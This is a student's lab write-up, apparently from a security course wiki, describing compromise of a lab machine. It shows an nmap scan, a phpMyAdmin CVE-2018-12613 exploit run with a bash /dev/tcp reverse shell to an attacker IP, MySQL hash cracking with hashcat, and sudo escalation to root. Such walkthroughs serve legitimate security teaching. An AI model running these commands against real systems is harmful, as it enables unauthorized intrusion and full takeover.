🛠️ SEC‐335 Tech Journal – Lab 10.2: Nancurunír - Snowboundport37/champlain GitHub Wiki

🛠️ SEC-335 Tech Journal – Lab 10.2: Nancurunír

🧙‍♂️ Project Theme

Target: nancurunir.shire.org
Pentester: Andrei

🧪 Technical Process Summary

🔍 Reconnaissance

  • Performed initial scan using Nmap: 
    nmap -sV -sC -oA nancurunir 10.0.5.28

Screenshot 2025-04-08 120914

  • Discovered phpMyAdmin 4.8.1 accessible at /phpmyadmin.

🚪 Foothold

  • Found valid login credentials:

    • Username: gandalf
    • Password: shallnotpass

  • Used Exploit-DB 50457 to exploit CVE-2018-12613:

    python3 pma_rce.py 10.0.5.28 80 /phpmyadmin gandalf shallnotpass \
  "bash -c 'exec bash -i &>/dev/tcp/10.0.17.45/4444 <&1'"

  • Listener on Kali:

    nc -lvnp 4444

  • Successfully received shell as www-data.

Screenshot 2025-04-08 120812

📈 Privilege Escalation

  • Found a MySQL password hash for root:

    *2B72EB4F3B82A23BA998F7F76675B83FE9FE8DDC8

  • Cracked hash using hashcat:

    hashcat -m 300 hash.txt /usr/share/wordlists/rockyou.txt --force
    • Cracked password: gandalfthewhite

Screenshot 2025-04-08 120652

  • Switched to user gandalf:

    su gandalf
Password: gandalfthewhite

  • Upgraded to full TTY shell:

    python3 -c 'import pty; pty.spawn("/bin/bash")'

  • Escalated to root:

    sudo -S su
Password: gandalfthewhite

image

🏁 Flags

  • User Flag:

    cat /home/gandalf/user-flag.txt
82745644-c7f3-4250-acba-aa453abb2249

  • Root Flag:

    cat /root/root-flag.txt
22815793-a31c-42e5-ab46-a42241152c26

image

image

💭 Reflection

🧠 Challenges Faced

  • Reverse shell wouldn’t initially connect due to quoting issues in the Python script.
  • Could not locate flags at first using cat; resolved using find.
  • Initially thought phpMyAdmin was off-limits, which added confusion.
  • Shell lacked TTY which blocked sudo until fixed with Python pty.spawn().

💡 Lessons Learned

  • Learned how to weaponize CVE-2018-12613 for authenticated RCE.
  • Gained experience cracking MySQL native password hashes with Hashcat.
  • Understood how misconfigured sudo access and password reuse lead to full system compromise.
  • Practiced chain exploitation: foothold → lateral movement → root.

✅ Summary

This lab was a complete end-to-end compromise starting from web login to full root. By chaining a known phpMyAdmin vulnerability with password hash cracking and a sudo misconfiguration, I was able to achieve total control over the Nancurunír target system. Every step reinforced real-world offensive security techniques.